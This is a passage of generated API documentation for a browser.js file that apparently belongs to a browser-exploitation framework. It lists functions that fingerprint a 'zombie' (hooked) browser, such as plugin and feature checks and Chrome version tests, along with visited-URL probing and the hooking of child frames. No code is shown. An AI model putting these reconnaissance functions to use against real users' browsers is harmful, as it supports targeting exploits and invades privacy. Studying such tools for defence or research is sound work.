<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line3698">line 3698</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasFoxit"><span class="type-signature">(static) </span>hasFoxit<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the zombie has Foxit PDF reader plugin.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4495">line 4495</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasGoogleGears"><span class="type-signature">(static) </span>hasGoogleGears<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the zombie has Google Gears installed.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4454">line 4454</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasJava"><span class="type-signature">(static) </span>hasJava<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the zombie has Java installed and enabled.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line3891">line 3891</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasPhonegap"><span class="type-signature">(static) </span>hasPhonegap<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the Phonegap API is available from the hooked origin.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line3858">line 3858</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasQuickTime"><span class="type-signature">(static) </span>hasQuickTime<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the zombie has the QuickTime plugin installed.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line3731">line 3731</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasRealPlayer"><span class="type-signature">(static) </span>hasRealPlayer<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the zombie has the RealPlayer plugin installed.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line3759">line 3759</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasSilverlight"><span class="type-signature">(static) </span>hasSilverlight<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns boolean value depending on whether the browser supports Silverlight</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4363">line 4363</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasVBScript"><span class="type-signature">(static) </span>hasVBScript<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the zombie has VBScript enabled.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line3905">line 3905</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasVisited"><span class="type-signature">(static) </span>hasVisited<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns array of results, whether or not the target zombie has visited the specified URL</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4383">line 4383</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasVLC"><span class="type-signature">(static) </span>hasVLC<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if VLC is installed</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line3824">line 3824</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasWebGL"><span class="type-signature">(static) </span>hasWebGL<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the zombie has WebGL enabled.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4438">line 4438</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasWebRTC"><span class="type-signature">(static) </span>hasWebRTC<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns boolean value depending on whether the browser supports WebRTC</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4356">line 4356</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasWebSocket"><span class="type-signature">(static) </span>hasWebSocket<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the zombie has Web Sockets enabled.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4420">line 4420</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasWebWorker"><span class="type-signature">(static) </span>hasWebWorker<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the zombie has Web Workers enabled.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4428">line 4428</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasWMP"><span class="type-signature">(static) </span>hasWMP<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the zombie has the Windows Media Player plugin installed.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line3798">line 3798</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hookChildFrames"><span class="type-signature">(static) </span>hookChildFrames<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Hooks all child frames in the current window
Restricted by same-origin policy</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line3672">line 3672</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isA"><span class="type-signature">(static) </span>isA<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Avant Browser.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line38">line 38</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isBrave"><span class="type-signature">(static) </span>isBrave<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Brave</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line70">line 70</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC"><span class="type-signature">(static) </span>isC<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2437">line 2437</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC5"><span class="type-signature">(static) </span>isC5<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 5.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1029">line 1029</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC6"><span class="type-signature">(static) </span>isC6<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 6.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1037">line 1037</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC7"><span class="type-signature">(static) </span>isC7<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 7.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1045">line 1045</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC8"><span class="type-signature">(static) </span>isC8<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 8.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1053">line 1053</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC9"><span class="type-signature">(static) </span>isC9<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 9.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1061">line 1061</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC10"><span class="type-signature">(static) </span>isC10<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 10.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1069">line 1069</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC11"><span class="type-signature">(static) </span>isC11<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 11.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1077">line 1077</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC12"><span class="type-signature">(static) </span>isC12<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 12.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1085">line 1085</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC13"><span class="type-signature">(static) </span>isC13<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 13.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1093">line 1093</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC14"><span class="type-signature">(static) </span>isC14<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 14.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1101">line 1101</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC15"><span class="type-signature">(static) </span>isC15<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 15.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1109">line 1109</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC16"><span class="type-signature">(static) </span>isC16<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 16.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1117">line 1117</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC17"><span class="type-signature">(static) </span>isC17<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 17.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1125">line 1125</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC18"><span class="type-signature">(static) </span>isC18<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 18.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1133">line 1133</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC19"><span class="type-signature">(static) </span>isC19<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 19.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1141">line 1141</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC19iOS"><span class="type-signature">(static) </span>isC19iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 19.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1149">line 1149</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC20"><span class="type-signature">(static) </span>isC20<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 20.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1157">line 1157</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC20iOS"><span class="type-signature">(static) </span>isC20iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 20.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1165">line 1165</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC21"><span class="type-signature">(static) </span>isC21<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 21.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1173">line 1173</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC21iOS"><span class="type-signature">(static) </span>isC21iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 21.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1181">line 1181</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC22"><span class="type-signature">(static) </span>isC22<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 22.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1189">line 1189</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC22iOS"><span class="type-signature">(static) </span>isC22iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 22.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1197">line 1197</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC23"><span class="type-signature">(static) </span>isC23<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 23.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1205">line 1205</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC23iOS"><span class="type-signature">(static) </span>isC23iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 23.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1213">line 1213</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC24"><span class="type-signature">(static) </span>isC24<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 24.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1221">line 1221</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC24iOS"><span class="type-signature">(static) </span>isC24iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 24.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1229">line 1229</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC25"><span class="type-signature">(static) </span>isC25<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 25.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1237">line 1237</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC25iOS"><span class="type-signature">(static) </span>isC25iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 25.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1245">line 1245</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC26"><span class="type-signature">(static) </span>isC26<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 26.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1253">line 1253</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC26iOS"><span class="type-signature">(static) </span>isC26iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 26.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1261">line 1261</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC27"><span class="type-signature">(static) </span>isC27<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 27.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1269">line 1269</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC27iOS"><span class="type-signature">(static) </span>isC27iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 27.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1277">line 1277</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC28"><span class="type-signature">(static) </span>isC28<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 28.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1285">line 1285</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC28iOS"><span class="type-signature">(static) </span>isC28iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 28.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1293">line 1293</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC29"><span class="type-signature">(static) </span>isC29<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 29.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1301">line 1301</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC29iOS"><span class="type-signature">(static) </span>isC29iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 29.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1309">line 1309</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC30"><span class="type-signature">(static) </span>isC30<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 30.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1317">line 1317</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC30iOS"><span class="type-signature">(static) </span>isC30iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 30.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1325">line 1325</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC31"><span class="type-signature">(static) </span>isC31<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 31.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1333">line 1333</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC31iOS"><span class="type-signature">(static) </span>isC31iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 31.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1341">line 1341</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC32"><span class="type-signature">(static) </span>isC32<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 32.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1349">line 1349</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC32iOS"><span class="type-signature">(static) </span>isC32iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 32.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1357">line 1357</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC33"><span class="type-signature">(static) </span>isC33<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 33.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1365">line 1365</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC33iOS"><span class="type-signature">(static) </span>isC33iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 33.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1373">line 1373</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC34"><span class="type-signature">(static) </span>isC34<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 34.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1381">line 1381</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC34iOS"><span class="type-signature">(static) </span>isC34iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 34.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1389">line 1389</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC35"><span class="type-signature">(static) </span>isC35<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 35.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1397">line 1397</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC35iOS"><span class="type-signature">(static) </span>isC35iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 35.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1405">line 1405</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC36"><span class="type-signature">(static) </span>isC36<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 36.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1413">line 1413</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC36iOS"><span class="type-signature">(static) </span>isC36iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 36.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1421">line 1421</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC37"><span class="type-signature">(static) </span>isC37<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 37.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1429">line 1429</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC37iOS"><span class="type-signature">(static) </span>isC37iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 37.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1437">line 1437</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC38"><span class="type-signature">(static) </span>isC38<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 38.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1445">line 1445</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC38iOS"><span class="type-signature">(static) </span>isC38iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 38.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1453">line 1453</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC39"><span class="type-signature">(static) </span>isC39<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 39.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1461">line 1461</a>
</li></ul></dd>
</dl>
